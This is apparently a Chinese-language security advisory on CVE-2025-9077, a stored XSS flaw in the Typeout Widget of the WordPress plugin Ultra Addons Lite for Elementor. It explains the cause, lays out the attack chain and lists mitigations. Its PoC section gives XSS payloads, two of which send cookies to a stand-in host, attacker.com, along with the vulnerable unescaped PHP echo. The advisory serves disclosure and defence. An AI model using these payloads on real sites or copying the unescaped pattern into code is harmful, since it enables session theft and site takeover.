CVE-2025-9077：WordPress Ultra Addons Lite插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9077

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ultra Addons Lite for Elementor（WordPress插件）

漏洞概述

CVE-2025-9077是WordPress插件Ultra Addons Lite for Elementor中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的研究员发现并报告，于2025年10月3日正式公开披露。Ultra Addons Lite for Elementor是一款广泛使用的WordPress页面构建器扩展插件，旨在为Elementor页面编辑器提供额外的UI组件和功能模块。

该漏洞存在于插件的Typeout Widget（打字机文本组件）的'Animated Text'（动画文本）字段中。由于插件开发者未对该字段的用户输入进行充分的安全过滤和输出转义处理，攻击者可以将恶意的JavaScript代码或HTML脚本注入到该字段中。这些恶意代码会被持久化存储在WordPress数据库中，每当普通用户或管理员访问包含该组件的页面时，恶意脚本将在受害者的浏览器中自动执行。

由于该漏洞需要攻击者至少拥有Contributor（投稿者）级别的WordPress账户权限才能利用，因此其CVSS评分为6.4分，属于中等危险等级。尽管如此，在多作者博客、开放注册社区或存在权限提升漏洞的环境中，该漏洞仍可能造成严重的安全威胁，包括但不限于会话劫持、权限提升、网站后台接管、恶意重定向以及敏感信息窃取等。

技术细节

该漏洞的根本原因在于Ultra Addons Lite for Elementor插件v1.1.9及以下版本中，Typeout Widget的'Animated Text'字段在处理用户输入时缺乏必要的安全机制：

1. **输入过滤不足**：插件在保存用户通过Elementor编辑器提交的'Animated Text'字段内容时，未调用WordPress标准的安全函数（如wp_kses()、sanitize_text_field()等）对输入数据进行过滤和清理，允许包含HTML标签和JavaScript代码的恶意载荷直接写入数据库。

2. **输出转义缺失**：在页面渲染阶段，插件从数据库读取'Animated Text'字段内容并输出到前端HTML时，未使用适当的转义函数（如esc_html()、esc_attr()等）对输出内容进行编码处理，导致存储在数据库中的恶意脚本原样输出到浏览器并被执行。

3. **利用方式**：拥有Contributor或更高权限的攻击者，在创建或编辑包含Typeout Widget的页面时，在'Animated Text'字段中输入类似`<script>alert(document.cookie)</script>`或`<img src=x onerror=alert(1)>`的恶意载荷。由于该字段支持富文本或未严格限制输入字符，恶意代码被成功存储。当其他用户（包括管理员）访问该页面时，浏览器解析并执行注入的脚本，攻击者可借此窃取用户Cookie、会话令牌，或执行未授权的操作。

4. **影响范围**：由于漏洞影响范围为S:C（Scope Changed），意味着利用该漏洞可以影响到超出插件本身安全上下文的资源，例如获取管理员权限后控制整个WordPress站点。

攻击链分析

STEP 1

步骤1：获取权限

攻击者通过注册、购买或社工等手段获取目标WordPress站点的Contributor（投稿者）级别或更高的账户权限。

STEP 2

步骤2：访问页面编辑器

攻击者登录WordPress后台，使用Elementor页面编辑器创建新页面或编辑现有页面。

STEP 3

步骤3：插入Typeout Widget

在Elementor编辑器中搜索并添加Ultra Addons Lite插件提供的Typeout Widget组件到页面中。

STEP 4

步骤4：注入恶意载荷

在Typeout Widget的'Animated Text'字段中输入包含恶意JavaScript代码的XSS载荷，如窃取Cookie、重定向或执行管理操作的脚本。

STEP 5

步骤5：发布页面

攻击者发布或更新页面，恶意载荷被存储到WordPress数据库中。由于缺乏输入过滤，恶意代码成功持久化。

STEP 6

步骤6：触发执行

当其他用户（特别是管理员）访问包含恶意Typeout Widget的页面时，浏览器解析并执行注入的脚本，攻击者可窃取会话、提权或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-9077: Stored XSS in Ultra Addons Lite for Elementor
Affected: Typeout Widget -> Animated Text field
Required: Contributor-level WordPress account
-->

<!-- Step 1: Login as Contributor or higher -->
<!-- Step 2: Create/Edit a page using Elementor -->
<!-- Step 3: Add the Typeout Widget to the page -->
<!-- Step 4: Inject malicious payload into the 'Animated Text' field -->

<!-- Payload examples for the Animated Text field: -->
<script>alert('XSS-CVE-2025-9077')</script>

<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

<img src=x onerror="fetch('https://attacker.com/log',{method:'POST',body:document.cookie})">

<!-- Step 5: Publish/Update the page -->
<!-- Step 6: When any user (including admin) visits the page, the script executes -->

<!-- Vulnerable code location (typeout.php line ~276): -->
<?php
// Vulnerable pattern - no sanitization or escaping:
echo '<span class="ut-elementor-typeout-text">' . $settings['animated_text'] . '</span>';
?>

<!-- Fixed code (v1.2.0) should use proper escaping: -->
<?php
echo '<span class="ut-elementor-typeout-text">' . esc_html( $settings['animated_text'] ) . '</span>';
?>

影响范围

Ultra Addons Lite for Elementor <= 1.1.9

防御指南

临时缓解措施

在无法立即升级插件的临时情况下，建议采取以下缓解措施：1）暂时禁用Ultra Addons Lite for Elementor插件；2）审查并限制Contributor及以上级别用户的页面发布权限；3）部署Wordfence等安全插件，配置XSS防护规则；4）在Web服务器层面配置Content-Security-Policy响应头，限制内联脚本执行；5）检查已发布页面中Typeout Widget的'Animated Text'字段内容，清理已注入的恶意代码；6）重置所有管理员账户的密码和会话令牌，防止已泄露凭据被利用。